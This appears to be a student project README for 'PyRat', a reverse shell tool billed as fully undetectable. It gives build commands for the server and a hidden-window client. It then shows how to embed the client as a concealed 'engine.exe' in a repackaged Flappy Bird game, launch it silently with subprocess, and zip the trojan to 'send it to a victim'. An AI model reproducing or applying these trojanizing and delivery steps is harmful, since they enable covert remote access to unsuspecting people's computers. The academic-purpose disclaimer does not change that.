A Fully Undetectable Python 3 Reverse Shell Script
Developed by Gerard Ian M. Balaoro
In Partial Fulfillment on the Requirements for the Subject
LIS 198: Information Security
1st Semester, A.Y. 2018-2019
University of the Philippines Diliman
The author intended this to be used solely for academic purposes
-
Install required Python packages.
pip install -r packages.txt
-
Run the server script.
python server.py --port 58777 -
Configure server settings inside config.ini.
{ "host":"127.0.0.1", "port":58777 } -
Run client script in another computer.
-
Server script
pyinstaller server.py -F -y -i assets/icons/shell.ico --distpath "dist/PyRat" --name "PyRatServer"
-
Client script, use the
windowedoption to prevent the script from launching a command windowpyinstaller client.py -F -y -i assets/icons/gear.ico --distpath "dist/PyRat" --name "PyRatClient"
It's faily easy to integrate this script to any Python application. In this example, we will use this Flappy Bird Game recreated by Sourabh Verma using the PyGame library.
All we need to do is execute the client script silently whenever the game is initialized. We also need to think of an unsuspicous name
to use when compiling the client script, in this case, we're using 'engine.exe'. This can be accomplished using Python's subprocess library:
import subprocess
payload = subprocess.Popen('engine', shell = True, stdout= None, stderr = None, stdin = None)Run pyinstaller and copy the assets folder to the destination:
pyinstaller flappy.py -F -y -i assets/icons/flappy.ico --distpath "dist/FlappyBird" --name "flappybird" --windowed
xcopy "assets" "dist/FlappyBird/assets" /E /S /YOnce done, we can now see our Trojan application inside the build/FlappyBird directory. All there's left to do is to change the configuration settings, compress this to a zip file and send it to a victim.
.
├── ...
├── config.ini # Server settings
├── engine.exe # Concealed payload
├── flappybird.exe
└── ...
- This script is based on this article from WonderHowTo.com